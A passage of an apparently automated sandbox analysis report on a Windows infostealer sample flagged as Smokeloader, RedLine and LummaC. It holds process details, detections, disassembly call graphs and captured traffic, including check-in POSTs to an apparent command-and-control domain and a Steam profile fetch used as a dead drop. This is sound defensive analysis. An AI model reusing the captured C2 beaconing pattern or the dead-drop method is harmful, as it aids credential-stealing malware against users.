                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=i5ieutg0c21pkcejh6a9vo33g4; expires=Thu, 10-Apr-2025 02:07:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W50U6mfpqP1zNvmhdo9bEwTsxzvDjIl3UaVj2jM4IFr6DPDFuEvtthAQyl2%2F%2BwwVQHhD5wKZwqBMBIEBb%2FXiwci3gJgV%2B3wHPD7s%2Fxq%2F6monnOq9zwVJoRJN4MEfZUL5kvo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8f2503d0aeab4378-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1552&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1770770&cwnd=235&unsent_bytes=0&cid=da03abd7d39ec9b8&ts=734&x=0"
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:31 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    2192.168.2.849708104.21.16.14435868C:\Users\user\AppData\Local\Temp\86DC.tmp.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:33 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                                                    Host: deafeninggeh.biz
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:34 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sun, 15 Dec 2024 08:20:34 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=fsre4q3663h0q86dq4979eaeh8; expires=Thu, 10-Apr-2025 02:07:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kEfK1hwbxpGbxysES3GENKRE6aqXrk%2Bs%2BZm7b%2B9t4mE%2F755smXMB9qcAkpc6rpEZSp3IFGzpJ8ysRO2ZX3IvaJwp8IOM2uBtDPvo%2Fv4hIsFO5EmAwJ1lHa%2ByaadEstRpfm5K"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8f2503dda83c8ce0-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1769&rtt_var=675&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1606160&cwnd=206&unsent_bytes=0&cid=0ebe5589ecdf8d2e&ts=1003&x=0"
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:34 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    3192.168.2.84971123.55.153.1064435868C:\Users\user\AppData\Local\Temp\86DC.tmp.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:36 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:37 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Date: Sun, 15 Dec 2024 08:20:37 GMT
                                                                                                                                                                                                                                                                                    Content-Length: 35131
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: sessionid=4670f5074b9bfea360f04536; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:37 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:37 UTC10097INData Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55
                                                                                                                                                                                                                                                                                    Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:37 UTC10555INData Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75
                                                                                                                                                                                                                                                                                    Data Ascii: ;WEB_UNIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&qu


                                                                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                    Start time:03:20:17
                                                                                                                                                                                                                                                                                    Start date:15/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\AZCFTWko2q.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    File size:429'056 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:7C13E0CBD1513ABE7F2D2D73CC0AD615
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                                    Start time:03:20:26
                                                                                                                                                                                                                                                                                    Start date:15/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\86DC.tmp.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\86DC.tmp.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    File size:361'984 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1549375881.0000000002510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                    • Detection: 62%, ReversingLabs
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                    Start time:03:20:38
                                                                                                                                                                                                                                                                                    Start date:15/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1708
                                                                                                                                                                                                                                                                                    Imagebase:0xd80000
                                                                                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:2.1%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                                                                                                                                      Signature Coverage:5.7%
                                                                                                                                                                                                                                                                                      Total number of Nodes:760
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:21
                                                                                                                                                                                                                                                                                      execution_graph 64978 24c003c 64979 24c0049 64978->64979 64993 24c0e0f SetErrorMode SetErrorMode 64979->64993 64984 24c0265 64985 24c02ce VirtualProtect 64984->64985 64987 24c030b 64985->64987 64986 24c0439 VirtualFree 64991 24c05f4 LoadLibraryA 64986->64991 64992 24c04be 64986->64992 64987->64986 64988 24c04e3 LoadLibraryA 64988->64992 64990 24c08c7 64991->64990 64992->64988 64992->64991 64994 24c0223 64993->64994 64995 24c0d90 64994->64995 64996 24c0dad 64995->64996 64997 24c0dbb GetPEB 64996->64997 64998 24c0238 VirtualAlloc 64996->64998 64997->64998 64998->64984 64999 402c04 InternetOpenW 65000 402e55 64999->65000 65003 402c37 Concurrency::details::ResourceManager::InitializeRMBuffers 64999->65003 65020 40f8cf 65000->65020 65002 402e64 65011 42defd 65003->65011 65006 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 65007 402e17 65006->65007 65008 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 65007->65008 65009 402e29 InternetOpenUrlW 65008->65009 65009->65000 65010 402e44 InternetCloseHandle InternetCloseHandle 65009->65010 65010->65000 65012 42df1a 65011->65012 65014 42df0c 65011->65014 65027 42eac9 20 API calls _Atexit 65012->65027 65014->65012 65017 42df4a 65014->65017 65016 402e09 65016->65006 65017->65016 65029 42eac9 20 API calls _Atexit 65017->65029 65019 42df24 65028 42a59d 26 API calls _Deallocate 65019->65028 65021 40f8d8 65020->65021 65022 40f8da IsProcessorFeaturePresent 65020->65022 65021->65002 65024 40f94d 65022->65024 65030 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65024->65030 65026 40fa30 65026->65002 65027->65019 65028->65016 65029->65019 65030->65026 65031 40fc06 65032 40fc12 ___DestructExceptionObject 65031->65032 65060 40fff3 65032->65060 65034 40fc19 65035 40fd6c 65034->65035 65039 40fc43 65034->65039 65081 4104d3 4 API calls 2 library calls 65035->65081 65037 40fd73 65082 42ffc9 28 API calls _Atexit 65037->65082 65049 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65039->65049 65075 42fcee 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65039->65075 65040 40fd79 65083 42ff7b 28 API calls _Atexit 65040->65083 65043 40fc5c 65045 40fc62 65043->65045 65076 42fc92 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65043->65076 65044 40fd81 65047 40fce3 65071 4105ed 65047->65071 65049->65047 65077 42a366 167 API calls 4 library calls 65049->65077 65051 40fce9 65052 40fcfe 65051->65052 65078 410623 GetModuleHandleW 65052->65078 65054 40fd05 65054->65037 65055 40fd09 65054->65055 65056 40fd12 65055->65056 65079 42ff6c 28 API calls _Atexit 65055->65079 65080 410182 13 API calls 2 library calls 65056->65080 65059 40fd1a 65059->65045 65061 40fffc 65060->65061 65084 41077b IsProcessorFeaturePresent 65061->65084 65063 410008 65085 428827 10 API calls 3 library calls 65063->65085 65065 41000d 65070 410011 65065->65070 65086 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65065->65086 65067 41001a 65068 410028 65067->65068 65087 428850 8 API calls 3 library calls 65067->65087 65068->65034 65070->65034 65088 426830 65071->65088 65073 410600 GetStartupInfoW 65074 410613 65073->65074 65074->65051 65075->65043 65076->65049 65077->65047 65078->65054 65079->65056 65080->65059 65081->65037 65082->65040 65083->65044 65084->65063 65085->65065 65086->65067 65087->65070 65089 426847 65088->65089 65089->65073 65089->65089 65090 432785 65095 432553 65090->65095 65093 4327ad 65096 43257e 65095->65096 65103 4326c7 65096->65103 65110 43c8ce 170 API calls 2 library calls 65096->65110 65098 432771 65114 42a59d 26 API calls _Deallocate 65098->65114 65100 4326d0 65100->65093 65107 43d01c 65100->65107 65102 432711 65102->65103 65111 43c8ce 170 API calls 2 library calls 65102->65111 65103->65100 65113 42eac9 20 API calls _Atexit 65103->65113 65105 432730 65105->65103 65112 43c8ce 170 API calls 2 library calls 65105->65112 65115 43c9f1 65107->65115 65109 43d037 65109->65093 65110->65102 65111->65105 65112->65103 65113->65098 65114->65100 65118 43c9fd ___DestructExceptionObject 65115->65118 65116 43ca0b 65133 42eac9 20 API calls _Atexit 65116->65133 65118->65116 65120 43ca44 65118->65120 65119 43ca10 65134 42a59d 26 API calls _Deallocate 65119->65134 65126 43cfcb 65120->65126 65125 43ca1a std::_Locinfo::_Locinfo_ctor 65125->65109 65136 43f941 65126->65136 65129 43ca68 65135 43ca91 LeaveCriticalSection __wsopen_s 65129->65135 65133->65119 65134->65125 65135->65125 65137 43f964 65136->65137 65138 43f94d 65136->65138 65139 43f983 65137->65139 65140 43f96c 65137->65140 65213 42eac9 20 API calls _Atexit 65138->65213 65217 434faa 10 API calls 2 library calls 65139->65217 65215 42eac9 20 API calls _Atexit 65140->65215 65144 43f952 65214 42a59d 26 API calls _Deallocate 65144->65214 65145 43f971 65216 42a59d 26 API calls _Deallocate 65145->65216 65146 43f98a MultiByteToWideChar 65149 43f9b9 65146->65149 65150 43f9a9 GetLastError 65146->65150 65219 4336a7 21 API calls 3 library calls 65149->65219 65218 42ea93 20 API calls 2 library calls 65150->65218 65151 43cfe1 65151->65129 65160 43d03c 65151->65160 65154 43f9c1 65155 43f9c8 MultiByteToWideChar 65154->65155 65158 43f9e9 65154->65158 65157 43f9dd GetLastError 65155->65157 65155->65158 65156 43346a _free 20 API calls 65156->65151 65220 42ea93 20 API calls 2 library calls 65157->65220 65158->65156 65221 43cd9f 65160->65221 65163 43d087 65239 43977e 65163->65239 65164 43d06e 65253 42eab6 20 API calls _Atexit 65164->65253 65167 43d073 65254 42eac9 20 API calls _Atexit 65167->65254 65168 43d08c 65169 43d095 65168->65169 65170 43d0ac 65168->65170 65255 42eab6 20 API calls _Atexit 65169->65255 65252 43cd0a CreateFileW 65170->65252 65174 43d09a 65256 42eac9 20 API calls _Atexit 65174->65256 65175 43d162 GetFileType 65178 43d1b4 65175->65178 65179 43d16d GetLastError 65175->65179 65177 43d137 GetLastError 65258 42ea93 20 API calls 2 library calls 65177->65258 65261 4396c7 21 API calls 3 library calls 65178->65261 65259 42ea93 20 API calls 2 library calls 65179->65259 65180 43d0e5 65180->65175 65180->65177 65257 43cd0a CreateFileW 65180->65257 65184 43d17b CloseHandle 65184->65167 65187 43d1a4 65184->65187 65186 43d12a 65186->65175 65186->65177 65260 42eac9 20 API calls _Atexit 65187->65260 65188 43d1d5 65191 43d221 65188->65191 65262 43cf1b 169 API calls 4 library calls 65188->65262 65190 43d1a9 65190->65167 65195 43d24e 65191->65195 65263 43cabd 167 API calls 4 library calls 65191->65263 65194 43d247 65194->65195 65197 43d25f 65194->65197 65264 4335cd 29 API calls 2 library calls 65195->65264 65198 43d009 65197->65198 65199 43d2dd CloseHandle 65197->65199 65207 43346a 65198->65207 65265 43cd0a CreateFileW 65199->65265 65201 43d308 65202 43d312 GetLastError 65201->65202 65203 43d257 65201->65203 65266 42ea93 20 API calls 2 library calls 65202->65266 65203->65198 65205 43d31e 65267 439890 21 API calls 3 library calls 65205->65267 65208 43349e _free 65207->65208 65209 433475 HeapFree 65207->65209 65208->65129 65209->65208 65210 43348a 65209->65210 65290 42eac9 20 API calls _Atexit 65210->65290 65212 433490 GetLastError 65212->65208 65213->65144 65214->65151 65215->65145 65216->65151 65217->65146 65218->65151 65219->65154 65220->65158 65222 43cdc0 65221->65222 65223 43cdda 65221->65223 65222->65223 65275 42eac9 20 API calls _Atexit 65222->65275 65268 43cd2f 65223->65268 65226 43cdcf 65276 42a59d 26 API calls _Deallocate 65226->65276 65228 43ce41 65236 43ce94 65228->65236 65279 42ffdf 26 API calls 2 library calls 65228->65279 65229 43ce12 65229->65228 65277 42eac9 20 API calls _Atexit 65229->65277 65232 43ce8f 65234 43cf0e 65232->65234 65232->65236 65233 43ce36 65278 42a59d 26 API calls _Deallocate 65233->65278 65280 42a5ca 11 API calls _Atexit 65234->65280 65236->65163 65236->65164 65238 43cf1a 65240 43978a ___DestructExceptionObject 65239->65240 65283 42e3ed EnterCriticalSection 65240->65283 65242 4397d8 65284 439887 65242->65284 65243 4397b6 65287 43955d 21 API calls 3 library calls 65243->65287 65244 439791 65244->65242 65244->65243 65249 439824 EnterCriticalSection 65244->65249 65247 439801 std::_Locinfo::_Locinfo_ctor 65247->65168 65248 4397bb 65248->65242 65288 4396a4 EnterCriticalSection 65248->65288 65249->65242 65250 439831 LeaveCriticalSection 65249->65250 65250->65244 65252->65180 65253->65167 65254->65198 65255->65174 65256->65167 65257->65186 65258->65167 65259->65184 65260->65190 65261->65188 65262->65191 65263->65194 65264->65203 65265->65201 65266->65205 65267->65203 65269 43cd47 65268->65269 65270 43cd62 65269->65270 65281 42eac9 20 API calls _Atexit 65269->65281 65270->65229 65272 43cd86 65282 42a59d 26 API calls _Deallocate 65272->65282 65274 43cd91 65274->65229 65275->65226 65276->65223 65277->65233 65278->65228 65279->65232 65280->65238 65281->65272 65282->65274 65283->65244 65289 42e435 LeaveCriticalSection 65284->65289 65286 43988e 65286->65247 65287->65248 65288->65242 65289->65286 65290->65212 65291 43410a 65292 434116 ___DestructExceptionObject 65291->65292 65293 434122 65292->65293 65294 434139 65292->65294 65325 42eac9 20 API calls _Atexit 65293->65325 65304 42caff EnterCriticalSection 65294->65304 65297 434127 65326 42a59d 26 API calls _Deallocate 65297->65326 65298 434149 65305 434186 65298->65305 65301 434132 std::_Locinfo::_Locinfo_ctor 65302 434155 65327 43417c LeaveCriticalSection __fread_nolock 65302->65327 65304->65298 65306 434194 65305->65306 65307 4341ae 65305->65307 65338 42eac9 20 API calls _Atexit 65306->65338 65328 432908 65307->65328 65310 434199 65339 42a59d 26 API calls _Deallocate 65310->65339 65311 4341b7 65335 4347d3 65311->65335 65315 4342bb 65317 4342c8 65315->65317 65321 43426e 65315->65321 65316 43423f 65319 43425c 65316->65319 65316->65321 65341 42eac9 20 API calls _Atexit 65317->65341 65340 43449f 31 API calls 4 library calls 65319->65340 65324 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65321->65324 65342 43431b 30 API calls 2 library calls 65321->65342 65322 434266 65322->65324 65324->65302 65325->65297 65326->65301 65327->65301 65329 432914 65328->65329 65330 432929 65328->65330 65343 42eac9 20 API calls _Atexit 65329->65343 65330->65311 65332 432919 65344 42a59d 26 API calls _Deallocate 65332->65344 65334 432924 65334->65311 65345 434650 65335->65345 65337 4341d3 65337->65315 65337->65316 65337->65324 65338->65310 65339->65324 65340->65322 65341->65324 65342->65324 65343->65332 65344->65334 65346 43465c ___DestructExceptionObject 65345->65346 65347 434664 65346->65347 65352 43467c 65346->65352 65380 42eab6 20 API calls _Atexit 65347->65380 65349 434730 65385 42eab6 20 API calls _Atexit 65349->65385 65350 434669 65381 42eac9 20 API calls _Atexit 65350->65381 65352->65349 65355 4346b4 65352->65355 65354 434735 65386 42eac9 20 API calls _Atexit 65354->65386 65370 4396a4 EnterCriticalSection 65355->65370 65358 43473d 65387 42a59d 26 API calls _Deallocate 65358->65387 65359 4346ba 65361 4346f3 65359->65361 65362 4346de 65359->65362 65371 434755 65361->65371 65382 42eac9 20 API calls _Atexit 65362->65382 65364 434671 std::_Locinfo::_Locinfo_ctor 